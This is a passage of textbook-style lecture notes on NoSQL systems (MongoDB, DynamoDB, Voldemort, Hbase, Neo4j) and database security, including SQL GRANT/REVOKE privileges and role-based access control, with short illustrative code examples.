NOSQL systems emphasize performance and flexibility over modeling power and
complex querying.
Not Requiring a Schema: The flexibility of not requiring a schema is achieved in many
NOSQL systems by allowing semi-structured, self-describing data.
Less Powerful Query Languages: Many applications that use NOSQL systems may not
require a powerful query language such as SQL, because search (read) queries in these systems
often locate single objects in a single file based on their object keys. NOSQL systems typically
provide a set of functions and operations as a programming API (application programming
interface), so reading and writing the data objects is accomplished by calling the appropriate
operations by the programmer. In many cases, the operations are called CRUD operations, for
Create, Read, Update, and Delete. In other cases, they are known as SCRUD because of an
added Search (or Find) operation.
Versioning: Some NOSQL systems provide storage of multiple versions of the data
items, with the timestamps of when the data version was created.
NOSQL systems have been characterized into four major categories, with some
additional categories that encompass other types of systems. They are
1. Document-based NOSQL systems: These systems store data in the form of documents
using well-known formats, such as JSON (JavaScript Object Notation). Documents are
accessible via their document id, but can also be accessed rapidly using other indexes.
2. NOSQL key-value stores: These systems have a simple data model based on fast access
by the key to the value associated with the key; the value can be a record or an object or
a document or even have a more complex data structure.
3. Column-based or wide column NOSQL systems: These systems partition a table by
column into column families, where each column family is stored in its own files.
4. Graph-based NOSQL systems: Data is represented as graphs, and related nodes can be
found by traversing the edges using path expressions.
The three letters in CAP refer to three desirable properties of distributed systems with
replicated data: consistency (among replicated copies), availability (of the system for read and
write operations) and partition tolerance (in the face of the nodes in the system being partitioned
by a network fault). Availability means that each read or write request for a data item will either
be processed successfully or will receive a message that the operation cannot be completed.
Partition tolerance means that the system can continue operating if the network connecting the
nodes has a fault that results in two or more partitions, where the nodes in each partition can
only communicate among each other. Consistency means that the nodes will have the same
copies of a replicated data item visible for various transactions.
The CAP theorem states that it is not possible to guarantee all three of the desirable
properties consistency, availability, and partition tolerance at the same time in a distributed
system with data replication. If this is the case, then the distributed system designer would have
to choose two properties out of the three to guarantee. It is generally assumed that in many
traditional (SQL) applications, guaranteeing consistency through the ACID properties is
important.
On the other hand, in a NOSQL distributed data store, a weaker consistency level is
often acceptable, and guaranteeing the other two properties (availability, partition tolerance) is
important. Hence, weaker consistency levels are often used in NOSQL systems instead of
guaranteeing serializability. In particular, a form of consistency known as eventual consistency
is often adopted in NOSQL systems.
MongoDB documents are stored in BSON (Binary JSON) format, which is a variation
of JSON with some additional data types and is more efficient for storage than JSON. Individual
documents are stored in a collection. We will use a simple example based on our COMPANY database.
The operation createCollection is used to create each collection; it takes the name of the
collection followed by an optional document of collection options. For example, the following
command creates a document collection called worker to hold information about the EMPLOYEEs
who work on each project (a collection called project to hold PROJECT objects is created in the
same way):
db.createCollection(“worker”, { capped : true, size : 5242880, max : 2000 } )
The first parameter is the name of the collection, which is followed by an
optional document that specifies collection options. In our example, the collection is capped;
this means it has upper limits on its storage space (size) and number of documents (max). The
capping parameters help the system choose the storage options for each collection.
Each document in a collection has a unique ObjectId field, called _id, which is
automatically indexed in the collection unless the user explicitly requests no index for the _id
field. The value of ObjectId can be specified by the user, or it can be system-generated if the
user does not specify an _id field for a particular document. System-generated ObjectIds have
a specific format, which combines the timestamp when the object is created (4 bytes, in an
internal MongoDB format), the node id (3 bytes), the process id (2 bytes), and a counter (3
bytes) into a 12-byte Id value. User-generated ObjectIds can have any value specified by the
user as long as it uniquely identifies the document, so these Ids are similar to primary keys
in relational systems.
A collection does not have a schema. The structure of the data fields in documents is
chosen based on how documents will be accessed and used, and the user can choose a
normalized design (similar to normalized relational tuples) or a denormalized design (similar
to XML documents or complex objects). Interdocument references can be specified by storing
in one document the ObjectId or ObjectIds of other related documents.
13.3.2 MongoDB CRUD Operations
MongoDb has several CRUD operations, where CRUD stands for (create, read, update,
delete). Documents can be created and inserted into their collections using the insert operation,
whose format is:
db.<collection_name>.insert(<document(s)>)
E.g. db.project.insert( { _id: “P1”, Pname: “ProductX”, Plocation: “Bellaire” })
db.worker.insert( [ { _id: “W1”, Ename: “John Smith”, ProjectId: “P1”, Hours: 32.5 },
{_id: “W2”, Ename: “Joyce English”, ProjectId: “P1”, Hours: 20.0} ] )
2. Another design option stores references to the workers inside the project document, so each
worker document omits the ProjectId field:
{ _id: “W2”,
Ename: “Joyce English”,
Hours: 20.0
}
3. A third option would use a normalized design, similar to First Normal Form relations.
The choice of which design option to use depends on how the data will be accessed.
E.g. Normalized project and worker documents (not a fully normalized design for M:N
relationships):
{
_id: “P1”,
Pname: “ProductX”,
Plocation: “Bellaire”
}
{ _id: “W1”,
Ename: “John Smith”,
ProjectId: “P1”,
Hours: 32.5
}
The parameters of the insert operation can include either a single document or an array of
documents. The delete operation is called remove, and the format is:
db.<collection_name>.remove(<condition>)
E.g. db.project.remove({Plocation: “Chennai”})
There is also an update operation, which has a condition to select certain documents, and
a $set clause to specify the update. It is also possible to use the update operation to replace
an existing document with another one but keep the same ObjectId.
E.g. To update the location of project P1, the command used is
db.project.update( { _id: “P1” }, { $set: { Plocation: “Chennai” } } )
For read queries, the main command is called find, and the format is:
db.<collection_name>.find(<condition>)
E.g. db.project.find({Plocation: “Chennai”})
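The same CRUD operations can be issued from an application program. The sketch below uses Python with the pymongo driver and assumes a MongoDB server reachable on localhost; the database name company is an assumption for this example.

from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017/")
db = client["company"]

# Create
db.project.insert_one({"_id": "P1", "Pname": "ProductX", "Plocation": "Bellaire"})
db.worker.insert_many([
    {"_id": "W1", "Ename": "John Smith", "ProjectId": "P1", "Hours": 32.5},
    {"_id": "W2", "Ename": "Joyce English", "ProjectId": "P1", "Hours": 20.0},
])

# Update: set a new location for project P1.
db.project.update_one({"_id": "P1"}, {"$set": {"Plocation": "Chennai"}})

# Read
for doc in db.project.find({"Plocation": "Chennai"}):
    print(doc)

# Delete
db.worker.delete_many({"ProjectId": "P1"})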
Key-value stores focus on high performance, availability, and scalability by storing data
in a distributed storage system. The data model used in key-value stores is relatively simple,
and in many of these systems, there is no query language but rather a set of operations that can
be used by the application programmers. The key is a unique identifier associated with a data
item and is used to locate this data item rapidly. The value is the data item itself, and it can have
very different formats for different key-value storage systems. In some cases, the value is just
a string of bytes or an array of bytes, and the application using the key-value store has to
interpret the structure of the data value. In other cases, some standard formatted data is allowed; for example, structured data rows (tuples) similar to relational data, or semistructured data using JSON or some other self-describing data format.
Different key-value stores can thus store unstructured, semistructured, or structured data items. The main characteristic of key-value stores is that every value (data item) must be associated with a unique key, and that retrieving the value by supplying the key must be very fast. Many systems fall under the key-value store label. Let us have a brief introductory overview of some of these systems and their characteristics.
13.4.1. DynamoDB
The basic data model in DynamoDB uses the concepts of tables, items, and attributes.
A table in DynamoDB does not have a schema; it holds a collection of self-describing items.
Each item will consist of a number of (attribute, value) pairs, and attribute values can be single-
valued or multivalued. So basically, a table will hold a collection of items, and each item is a
self-describing record (or object). DynamoDB also allows the user to specify the items in JSON
format, and the system will convert them to the internal storage format of DynamoDB.
When a table is created, it is required to specify a table name and a primary key; the
primary key will be used to rapidly locate the items in the table. Thus, the primary key is the
key and the item is the value for the DynamoDB key-value store.
The primary key attribute must exist in every item in the table. The primary key can be
one of the following two types:
• A single attribute. The DynamoDB system will use this attribute to build a hash index
on the items in the table. This is called a hash type primary key. The items are not ordered in storage by the value of the hash attribute.
• A pair of attributes. This is called a hash and range type primary key. The primary key
will be a pair of attributes (A, B): attribute A will be used for hashing, and because there
will be multiple items with the same value of A, the B values will be used for ordering
the records with the same A value. A table with this type of key can have additional
secondary indexes defined on its attributes. For example, if we want to store multiple
versions of some type of items in a table, we could use ItemID as hash and Date or
Timestamp (when the version was created) as range in a hash and range type primary
key.
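The effect of a hash and range type primary key can be pictured with the following minimal sketch (plain Python, not DynamoDB's actual API; the ItemId and Timestamp attributes are illustrative): items are located by the hash attribute, and the items that share a hash value are kept ordered by the range attribute.

# Sketch of a hash and range type primary key: ItemId is the hash attribute and
# Timestamp is the range attribute used to order the versions of each item.
from collections import defaultdict

table = defaultdict(list)    # ItemId -> list of (Timestamp, attributes), kept ordered

def put_item(item_id, timestamp, attributes):
    versions = table[item_id]
    versions.append((timestamp, attributes))
    versions.sort(key=lambda v: v[0])      # keep the items ordered by the range attribute

def query(item_id):
    return table[item_id]                  # all versions of the item, ordered by Timestamp

put_item("I1", "2024-01-01", {"Price": 100})
put_item("I1", "2024-06-01", {"Price": 120})    # a later version of the same item
print(query("I1"))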
13.4.2. Voldemort
Voldemort is an open source system available through Apache 2.0 open source licensing
rules. It is based on Amazon’s Dynamo design. The focus is on high performance and horizontal
scalability, as well as on providing replication for high availability and sharding for improving
latency (response time) of read and write requests. All three of those features - replication,
sharding, and horizontal scalability—are realized through a technique to distribute the key-
value pairs among the nodes of a distributed cluster; this distribution is known as consistent
hashing. Voldemort has been used by LinkedIn for data storage. Some of the features of
Voldemort are as follows:
• Simple basic operations: A collection of (key, value) pairs is kept in a Voldemort store; the basic operations on the store are get(key), put(key, value), and delete(key).
• High-level formatted data values: The values v in the (k, v) items can be specified in
JSON (JavaScript Object Notation), and the system will convert between JSON and the
internal storage format. Other data object formats can also be specified if the application
provides the conversion (also known as serialization) between the user format and the
storage format as a Serializer class.
• Consistent hashing for distributing (key, value) pairs: A variation of the data distribution algorithm known as consistent hashing is used in Voldemort for data distribution among the nodes in the distributed cluster of nodes; a simplified sketch of this idea appears after this list.
• Consistency and versioning: Voldemort uses a method similar to the one developed for Amazon’s Dynamo for consistency in the presence of replicas. Basically, concurrent write
operations are allowed by different processes so there could exist two or more different
values associated with the same key at different nodes when items are replicated.
Consistency is achieved when the item is read by using a technique known as versioning
and read repair. Concurrent writes are allowed, but each write is associated with a vector
clock value. When a read occurs, it is possible that different versions of the same value
(associated with the same key) are read from different nodes. If the system can reconcile
to a single final value, it will pass that value to the read; otherwise, more than one version
can be passed back to the application, which will reconcile the various versions into one
version based on the application semantics and give this reconciled value back to the
nodes.
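The consistent hashing technique mentioned above can be pictured with the following simplified sketch (an illustration only, not Voldemort's actual implementation): each node is hashed to a position on a ring, and a key is stored on the first node at or after the key's position, so adding or removing a node moves only the keys in one segment of the ring.

# Simplified consistent-hashing sketch: nodes are placed on a hash ring and each
# key is assigned to the first node at or after the key's position on the ring.
import hashlib
from bisect import bisect

def ring_position(value):
    return int(hashlib.md5(value.encode()).hexdigest(), 16)

nodes = ["node-A", "node-B", "node-C"]
ring = sorted((ring_position(n), n) for n in nodes)
positions = [pos for pos, _ in ring]

def node_for_key(key):
    idx = bisect(positions, ring_position(key)) % len(ring)   # wrap around the ring
    return ring[idx][1]

for key in ["W1", "W2", "P1"]:
    print(key, "->", node_for_key(key))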
13.4.3. Examples of Other Key-Value Stores
Oracle key-value store
Oracle has one of the well-known SQL relational database systems, and Oracle also
offers a system based on the key-value store concept; this system is called the Oracle NoSQL
Database.
Redis key-value cache and store
Redis differs from the other systems discussed here because it caches its data in main
memory to further improve performance. It offers master-slave replication and high availability,
and it also offers persistence by backing up the cache to disk.
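For illustration, the same style of key-value access can be tried from Python using the redis client package (a sketch only; it assumes a Redis server running locally on the default port):

# Minimal Redis sketch: values are stored and retrieved by key; the Redis server
# keeps the data in main memory and can persist it to disk in the background.
import redis

r = redis.Redis(host="localhost", port=6379)
r.set("emp:W1:name", "John Smith")      # store a (key, value) pair
print(r.get("emp:W1:name"))             # fast retrieval by key
r.delete("emp:W1:name")                 # remove the pair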
Apache Cassandra
Cassandra is a NOSQL system that is not easily categorized into one category; it is sometimes listed in the column-based NOSQL category or in the key-value category. It offers features from several NOSQL categories and is used by Facebook as well as many other customers.
13.5. COLUMN BASED SYSTEMS
Another category of NOSQL systems is known as column-based or wide column
systems. The Google distributed storage system for big data, known as BigTable, is a well-
known example of this class of NOSQL systems, and it is used in many Google applications
that require large amounts of data storage, such as Gmail. BigTable uses the Google File System (GFS) for data storage and distribution. An open source system known as Apache Hbase is somewhat similar to Google BigTable.
BigTable (and Hbase) is sometimes described as a sparse multidimensional distributed
persistent sorted map, where the word map means a collection of (key, value) pairs (the key is
mapped to the value). One of the main differences that distinguish column-based systems from
key-value stores is the nature of the key. In column-based systems such as Hbase, the key is
multidimensional and so has several components: typically, a combination of table name, row
key, column, and timestamp. As we shall see, the column is typically composed of two
components: column family and column qualifier.
Hbase data model. The data model in Hbase organizes data using the concepts of
namespaces, tables, column families, column qualifiers, columns, rows, and data cells. A
column is identified by a combination of (column family:column qualifier). Data is stored in a
self-describing form by associating columns with data values, where data values are strings.
Hbase also stores multiple versions of a data item, with a timestamp associated with each
version, so versions and timestamps are also part of the Hbase data model. As with other
NOSQL systems, unique keys are associated with stored data items for fast access, but the keys
identify cells in the storage system. Because the focus is on high performance when storing
huge amounts of data, the data model includes some storage-related concepts. We discuss the
Hbase data modeling concepts and define the terminology next. It is important to note that the
use of the words table, row, and column is not identical to their use in relational databases, but
the uses are related.
• Tables and Rows
Data in Hbase is stored in tables, and each table has a table name. Data in a table is
stored as self-describing rows. Each row has a unique row key, and row keys are strings
that must have the property that they can be lexicographically ordered, so characters that
do not have a lexicographic order in the character set cannot be used as part of a row
key.
• Column Families, Column Qualifiers, and Columns
A table is associated with one or more column families. Each column family will have
a name, and the column families associated with a table must be specified when the table
is created and cannot be changed later.
When the data is loaded into a table, each column family can be associated with many
column qualifiers, but the column qualifiers are not specified as part of creating a table.
So the column qualifiers make the model a self-describing data model because the
qualifiers can be dynamically specified as new rows are created and inserted into the
table. A column is specified by a combination of ColumnFamily: ColumnQualifier.
• Versions and Timestamps
Hbase can keep several versions of a data item, along with the timestamp associated
with each version. The timestamp is a long integer number that represents the system
time when the version was created, so newer versions have larger timestamp values.
Hbase uses midnight ‘January 1, 1970 UTC’ as timestamp value zero, and uses a long
integer that measures the number of milliseconds since that time as the system
timestamp value.
• Cells
A cell holds a basic data item in Hbase. The key (address) of a cell is specified by a
combination of (table, rowid, columnfamily, columnqualifier, timestamp). If timestamp
is left out, the latest version of the item is retrieved unless a default number of versions
is specified, say the latest three versions. The default number of versions to be retrieved, as well as the default number of versions that the system needs to keep, are parameters that can be specified during table creation; a sketch of this cell addressing scheme appears after this list.
• Namespaces
A namespace is a collection of tables; it corresponds roughly to a database (a collection of related tables) in relational terminology.
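The cell addressing described above can be modeled with a minimal sketch (plain Python, not Hbase's actual API): a cell is located by (table, row key, column family, column qualifier) and keeps timestamped versions, with the latest version returned by default.

# Sketch of Hbase-style cells: each cell is addressed by
# (table, row key, column family, column qualifier) and holds timestamped versions.
cells = {}     # (table, row, family, qualifier) -> list of (timestamp, value)

def put(table, row, family, qualifier, value, timestamp):
    cells.setdefault((table, row, family, qualifier), []).append((timestamp, value))

def get(table, row, family, qualifier, timestamp=None):
    versions = cells.get((table, row, family, qualifier), [])
    if timestamp is not None:
        versions = [v for v in versions if v[0] <= timestamp]
    return max(versions)[1] if versions else None      # newest surviving version

put("EMPLOYEE", "row1", "Address", "City", "Houston", timestamp=1)
put("EMPLOYEE", "row1", "Address", "City", "Bellaire", timestamp=2)
print(get("EMPLOYEE", "row1", "Address", "City"))               # latest version: Bellaire
print(get("EMPLOYEE", "row1", "Address", "City", timestamp=1))  # older version: Houston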
Each Hbase table is divided into a number of regions, where each region will hold a
range of the row keys in the table; this is why the row keys must be lexicographically ordered.
Each region will have a number of stores, where each column family is assigned to one store
within the region. Regions are assigned to region servers (storage nodes) for storage. A master
server (master node) is responsible for monitoring the region servers and for splitting a table
into regions and assigning regions to region servers.
Hbase uses the Apache Zookeeper open source system for services related to managing
the naming, distribution, and synchronization of the Hbase data on the distributed Hbase server
nodes, as well as for coordination and replication services. Hbase also uses Apache HDFS
(Hadoop Distributed File System) for distributed file services. So Hbase is built on top of both
HDFS and Zookeeper.
13.6. GRAPH DATABASES AND NEO4J
The data model in Neo4j organizes data using the concepts of nodes and relationships.
Both nodes and relationships can have properties, which store the data items associated with
nodes and relationships. Nodes can have labels; the nodes that have the same label are grouped
into a collection that identifies a subset of the nodes in the database graph for querying purposes.
A node can have zero, one, or several labels. Relationships are directed; each relationship has
a start node and end node as well as a relationship type, which serves a similar role to a node
label by identifying similar relationships that have the same relationship type. Properties can be
specified via a map pattern, which is made of one or more “name : value” pairs enclosed in
curly brackets; for example {Lname : ‘Smith’, Fname : ‘John’, Minit : ‘B’}.
There are various ways in which nodes and relationships can be created; for example,
by calling appropriate Neo4j operations from various Neo4j APIs. We will just show the high-
level syntax for creating nodes and relationships; to do so, we will use the Neo4j CREATE
command, which is part of the high-level declarative query language Cypher. Neo4j has many
options and variations for creating nodes and relationships using various scripting interfaces.
When a node is created, the node label can be specified. It is also possible to create
nodes without any labels.
CREATE (e1: EMPLOYEE, {Empid: ‘1’, Lname: ‘Smith’, Fname: ‘John’, Minit: ‘B’})
CREATE (e2: EMPLOYEE, {Empid: ‘2’, Lname: ‘Wong’, Fname: ‘Franklin’})
CREATE (e3: EMPLOYEE, {Empid: ‘3’, Lname: ‘Zelaya’, Fname: ‘Alicia’})
CREATE (e4: EMPLOYEE, {Empid: ‘4’, Lname: ‘Wallace’, Fname: ‘Jennifer’, Minit: ‘S’})
…
CREATE (d1: DEPARTMENT, {Dno: ‘5’, Dname: ‘Research’})
CREATE (d2: DEPARTMENT, {Dno: ‘4’, Dname: ‘Administration’})
…
CREATE (p1: PROJECT, {Pno: ‘1’, Pname: ‘ProductX’})
CREATE (p2: PROJECT, {Pno: ‘2’, Pname: ‘ProductY’})
CREATE (p3: PROJECT, {Pno: ‘10’, Pname: ‘Computerization’})
CREATE (p4: PROJECT, {Pno: ‘20’, Pname: ‘Reorganization’})
…
CREATE (loc1: LOCATION, {Lname: ‘Houston’})
Relationships between these nodes are created in a similar way. For example, a few representative relationships can be created as follows:
CREATE (e1) - [ : WorksFor ] → (d1)
CREATE (e2) - [ : WorksFor ] → (d1)
CREATE (d1) - [ : LocatedIn ] → (loc1)
CREATE (e1) - [ : WorksOn {Hours: ‘32.5’} ] → (p1)
The → specifies the direction of the relationship, but the relationship can be traversed in either direction. The relationship types (labels) are WorksFor, Manager, LocatedIn, and WorksOn; only relationships with the relationship type WorksOn have properties (Hours).
• Paths
A path specifies a traversal of part of the graph. It is typically used as part of a query to
specify a pattern, where the query will retrieve from the graph data that matches the
pattern. A path is typically specified by a start node, followed by one or more
relationships, leading to one or more end nodes that satisfy the pattern.
• Optional Schema
A schema is optional in Neo4j. Graphs can be created and used without a schema, but
in Neo4j version 2.0, a few schema-related functions were added. The main features
related to schema creation involve creating indexes and constraints based on the labels
and properties. For example, it is possible to create the equivalent of a key constraint on
a property of a label, so all nodes in the collection of nodes associated with the label
must have unique values for that property.
When a node is created, the Neo4j system creates an internal unique system-defined
identifier for each node. To retrieve individual nodes using other properties of the nodes
efficiently, the user can create indexes for the collection of nodes that have a particular
label. Typically, one or more of the properties of the nodes in that collection can be
indexed. For example, Empid can be used to index nodes with the EMPLOYEE label,
Dno to index the nodes with the DEPARTMENT label, and Pno to index the nodes with
the PROJECT label.
Neo4j Interfaces and Distributed System Characteristics
Neo4j has other interfaces that can be used to create, retrieve, and update nodes and relationships in a graph database. It also has two main versions: the enterprise edition, which comes with additional capabilities, and the community edition. We discuss some of the additional features of Neo4j in this subsection.
Both editions support the Neo4j graph data model and storage system, as well as the
Cypher graph query language, and several other interfaces, including a high-performance native API, language drivers for several popular programming languages such as Java, Python, and PHP, and the REST (Representational State Transfer) API. In
addition, both editions support ACID properties. The enterprise edition supports
additional features for enhancing performance, such as caching and clustering of data
and locking.
• Graph visualization interface
Neo4j has a graph visualization interface, so that a subset of the nodes and edges in a
database graph can be displayed as a graph. This tool can be used to visualize query
results in a graph representation.
• Master-slave replication
Neo4j can be configured on a cluster of distributed system nodes (computers), where
one node is designated the master node. The data and indexes are fully replicated on
each node in the cluster. Various ways of synchronizing the data between master and
slave nodes can be configured in the distributed cluster.
• Caching
A main memory cache can be configured to store the graph data for improved
performance.
• Logical logs
Logs can be maintained to recover from failures. A full discussion of all the features and interfaces of Neo4j is outside the scope of our presentation. Full documentation of Neo4j is available online.
Neo4j has a high-level query language, Cypher. A Cypher query is made up of clauses. When a query has several clauses, the result from one clause can be the input to the next clause in the query. Basic simplified syntax of some common Cypher clauses is listed below:
• MATCH <pattern> : finds paths in the graph that match the specified pattern
• WHERE <condition> : restricts the result to data satisfying the condition
• RETURN <values> : specifies the values returned as the query result
• ORDER BY <values>, LIMIT <number> : orders the result and limits how many items are returned
• CREATE, DELETE, SET : create and delete nodes and relationships, and set the values of properties
14.1. INTRODUCTION TO DATABASE SECURITY
Database security is a broad area that addresses many issues, including the following:
• Various legal and ethical issues regarding the right to access certain information; for example, some information may be deemed to be private and cannot be accessed legally by unauthorized organizations or persons.
• Policy issues at the governmental, institutional, or corporate level regarding what kinds
of information should not be made publicly available—for example, credit ratings and
personal medical records.
• System-related issues such as the system levels at which various security functions
should be enforced—for example, whether a security function should be handled at the
physical hardware level, the operating system level, or the DBMS level.
• The need in some organizations to identify multiple security levels and to categorize the
data and users based on these classifications—for example, top secret, secret,
confidential, and unclassified.
Threats to databases can result in the loss or degradation of some or all of the following
commonly accepted security goals: integrity, availability, and confidentiality.
The database administrator (DBA) enforces security through privileged actions that include the following:
1. Account creation: This action creates a new account and password for a user or a group
of users to enable access to the DBMS.
2. Privilege granting: This action permits the DBA to grant certain privileges to certain
accounts.
3. Privilege revocation: This action permits the DBA to revoke (cancel) certain privileges
that were previously given to certain accounts.
4. Security level assignment: This action consists of assigning user accounts to the
appropriate security clearance level.
The DBA is responsible for the overall security of the database system. Action 1 in the
preceding list is used to control access to the DBMS as a whole, whereas actions 2 and 3 are
used to control discretionary database authorization, and action 4 is used to control mandatory
authorization.
To keep a record of all updates applied to the database and of the particular users who applied each update, a system log is used. It includes an entry for each operation applied to the
database that may be required for recovery from a transaction failure or system crash. We can
expand the log entries so that they also include the account number of the user and the online
computer or device ID that applied each operation recorded in the log. If any tampering with
the database is suspected, a database audit is performed, which consists of reviewing the log to
examine all accesses and operations applied to the database during a certain time period. When
an illegal or unauthorized operation is found, the DBA can determine the account number used
to perform the operation. Database audits are particularly important for sensitive databases that
are updated by many transactions and users, such as a banking database that can be updated by
thousands of bank tellers. A database log that is used mainly for security purposes serves as an
audit trail.
Sensitivity of data is a measure of the importance assigned to the data by its owner for
the purpose of denoting its need for protection. Some databases contain only sensitive data
whereas other databases may contain no sensitive data at all. Handling databases that fall at
these two extremes is relatively easy because such databases can be covered by access control.
The situation becomes tricky when some of the data is sensitive whereas other data is not.
Several factors must be considered before deciding whether it is safe to reveal the data.
The three most important factors are data availability, access acceptability, and authenticity
assurance.
1. Data availability: If a user is updating a field, then this field becomes inaccessible and other users should not be able to view this data. This blocking is only temporary and only to ensure that no user sees any inaccurate data. This is typically handled by the concurrency control mechanism.
2. Access acceptability: Data should be revealed only to authorized users. Before access is granted, the system should verify that the user is authorized to access the data referenced by the query.
3. Authenticity assurance: Before access is granted, certain external characteristics about the user may also be considered; for example, access may be permitted only during working hours.
The term precision, when used in the security area, refers to allowing as much as
possible of the data to be available, subject to protecting exactly the subset of data that is
sensitive. The definitions of security versus precision are as follows:
• Security: Means of ensuring that data is kept safe from corruption and that access to it
is suitably controlled. To provide security means to disclose only nonsensitive data and
to reject any query that references a sensitive field.
• Precision: To protect all sensitive data while disclosing or making available as much
nonsensitive data as possible.
Informally, there are two levels for assigning privileges to use the database system:
• The account level: At this level, the DBA specifies the particular privileges that each
account holds independently of the relations in the database.
• The relation (or table) level: At this level, the DBA can control the privilege to access
each individual relation or view in the database.
The granting and revoking of privileges generally follow an authorization model for
discretionary privileges known as the access matrix model, where the rows of a matrix M
represent subjects (users, accounts, programs) and the columns represent objects (relations,
records, columns, views, operations). Each position M(i, j) in the matrix represents the types of
privileges (read, write, update) that subject i holds on object j.
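As an illustration (a sketch, not a DBMS implementation), the access matrix M can be represented as a mapping from (subject, object) pairs to the set of privileges held; the subjects and privileges below are hypothetical:

# Access matrix sketch: M[(subject, object)] is the set of privileges
# that the subject holds on the object.
M = {
    ("user1", "EMPLOYEE"): {"SELECT", "INSERT", "DELETE", "UPDATE"},   # owner account
    ("user2", "EMPLOYEE"): {"INSERT", "DELETE"},
    ("user3", "EMPLOYEE"): {"SELECT"},
}

def is_authorized(subject, obj, privilege):
    # a request is allowed only if the privilege appears in M(i, j)
    return privilege in M.get((subject, obj), set())

print(is_authorized("user2", "EMPLOYEE", "DELETE"))   # True
print(is_authorized("user2", "EMPLOYEE", "SELECT"))   # False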
In SQL, the following types of privileges can be granted on each individual relation R:
• SELECT (retrieval or read) privilege on R: Gives the account retrieval privilege using
the SELECT statement to retrieve tuples from R.
• Modification privileges on R: This gives the account the capability to modify the tuples
of R. In SQL, this includes three privileges: UPDATE, DELETE, and INSERT.
Additionally, both the INSERT and UPDATE privileges can specify that only certain
attributes of R can be modified by the account.
• References privilege on R. This gives the account the capability to reference (or refer
to) a relation R when specifying integrity constraints. This privilege can also be
restricted to specific attributes of R.
In some cases, it is desirable to grant a privilege to a user temporarily. For example, the
owner of a relation may want to grant the SELECT privilege to a user for a specific task and
then revoke that privilege once the task is completed. Hence, a mechanism for revoking
privileges is needed. In SQL, a REVOKE command is included for the purpose of canceling
privileges.
It is possible for a user to receive a certain privilege from two or more sources. For
example, A4 may receive a certain UPDATE R privilege from both A2 and A3. In such a case,
if A2 revokes this privilege from A4, A4 will still continue to have the privilege by virtue of
having been granted it from A3. If A3 later revokes the privilege from A4, A4 totally loses the
privilege. Hence, a DBMS that allows propagation of privileges must keep track of how all the
privileges were granted in the form of some internal log so that revoking of privileges can be
done correctly and completely.
Suppose that the DBA creates four accounts—A1, A2, A3, and A4—and wants only A1
to be able to create base relations. To do this, the DBA must issue the following GRANT
command in SQL:
GRANT CREATETAB TO A1;
The CREATETAB (create table) privilege gives account A1 the capability to create new
database tables (base relations) and is hence an account privilege. Note that A1, A2, and so
forth may be individuals, like John in IT department or Mary in marketing; but they may also
be applications or programs that want to access a database.
In SQL2, the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command, as follows:
CREATE SCHEMA EXAMPLE AUTHORIZATION A1;
User account A1 can now create tables under the schema called EXAMPLE. To
continue our example, suppose that A1 creates the two base relations EMPLOYEE and DEPARTMENT; A1 is then the owner of these two relations and hence has all the relation
privileges on each of them.
Next, suppose that account A1 wants to grant to account A2 the privilege to insert and
delete tuples in both of these relations. However, A1 does not want A2 to be able to propagate
these privileges to additional accounts. A1 can issue the following command:
GRANT INSERT, DELETE ON EMPLOYEE, DEPARTMENT TO A2;
The owner account A1 of a relation automatically has the GRANT OPTION, allowing
it to grant privileges on the relation to other accounts. However, account A2 cannot grant
INSERT and DELETE privileges on the EMPLOYEE and DEPARTMENT tables because A2
was not given the GRANT OPTION in the preceding command.
Next, suppose that A1 wants to allow account A3 to retrieve information from either of
the two tables and also to be able to propagate the SELECT privilege to other accounts. A1 can
issue the following command:
GRANT SELECT ON EMPLOYEE, DEPARTMENT TO A3 WITH GRANT OPTION;
The clause WITH GRANT OPTION means that A3 can now propagate the privilege to
other accounts by using GRANT. For example, A3 can grant the SELECT privilege on the
EMPLOYEE relation to A4 by issuing the following command:
GRANT SELECT ON EMPLOYEE TO A4;
Now suppose that A1 decides to revoke the SELECT privilege on the EMPLOYEE
relation from A3; A1 then can issue this command:
REVOKE SELECT ON EMPLOYEE FROM A3;
The DBMS must now revoke the SELECT privilege on EMPLOYEE from A3, and it
must also automatically revoke the SELECT privilege on EMPLOYEE from A4. This is
because A3 granted that privilege to A4, but A3 does not have the privilege any more.
Next, suppose that A1 wants to give back to A3 a limited capability to SELECT from
the EMPLOYEE relation and wants to allow A3 to be able to propagate the privilege. The
limitation is to retrieve only the Name, Bdate, and Address attributes and only for the tuples
with Dno = 5. A1 then can create the following view:
CREATE VIEW A3EMPLOYEE AS
SELECT Name, Bdate, Address
FROM EMPLOYEE
WHERE Dno = 5;
After the view is created, A1 can grant SELECT on the view A3EMPLOYEE to A3 as follows:
GRANT SELECT ON A3EMPLOYEE TO A3 WITH GRANT OPTION;
The UPDATE and INSERT privileges can specify particular attributes that may be
updated or inserted in a relation. Finally, suppose that A1 wants to allow A4 to update only the
Salary attribute of EMPLOYEE; A1 can then issue the following command:
GRANT UPDATE ON EMPLOYEE (Salary) TO A4;
Role-based access control (RBAC) has emerged as a proven technology for managing
and enforcing security in large-scale enterprise-wide systems. Its basic notion is that privileges
and other permissions are associated with organizational roles rather than with individual users.
Individual users are then assigned to appropriate roles. Roles can be created using the CREATE
ROLE and DESTROY ROLE commands. The GRANT and REVOKE can then be used to
assign and revoke privileges from roles, as well as for individual users when needed. For
example, a company may have roles such as sales account manager, purchasing agent, mailroom
clerk, customer service manager, and so on. Multiple individuals can be assigned to each role.
Security privileges that are common to a role are granted to the role name, and any individual
assigned to this role would automatically have those privileges granted.
RBAC can be used with traditional access controls; it ensures that only authorized users
in their specified roles are given access to certain data or resources.
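A minimal sketch of this idea (with illustrative role and privilege names, not a particular DBMS's catalog) attaches privileges to roles and users to roles:

# RBAC sketch: privileges are granted to roles, and users acquire privileges
# only through the roles assigned to them.
role_privileges = {
    "sales_account_manager": {("SELECT", "CUSTOMER"), ("UPDATE", "ORDERS")},
    "mailroom_clerk":        {("SELECT", "ADDRESS_LIST")},
}
user_roles = {
    "john": {"sales_account_manager"},
    "mary": {"mailroom_clerk"},
}

def has_privilege(user, privilege, obj):
    # a user holds a privilege only if one of the user's roles holds it
    return any((privilege, obj) in role_privileges.get(role, set())
               for role in user_roles.get(user, set()))

print(has_privilege("john", "UPDATE", "ORDERS"))   # True, inherited from the role
print(has_privilege("mary", "UPDATE", "ORDERS"))   # False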
Each session can be assigned to several roles, but it maps to one user or a single subject
only. Many DBMSs have allowed the concept of roles, where privileges can be assigned to
roles.
Two roles are said to be mutually exclusive if both the roles cannot be used
simultaneously by the user. Mutual exclusion of roles can be categorized into two types, namely
authorization time exclusion (static) and runtime exclusion (dynamic). In authorization time
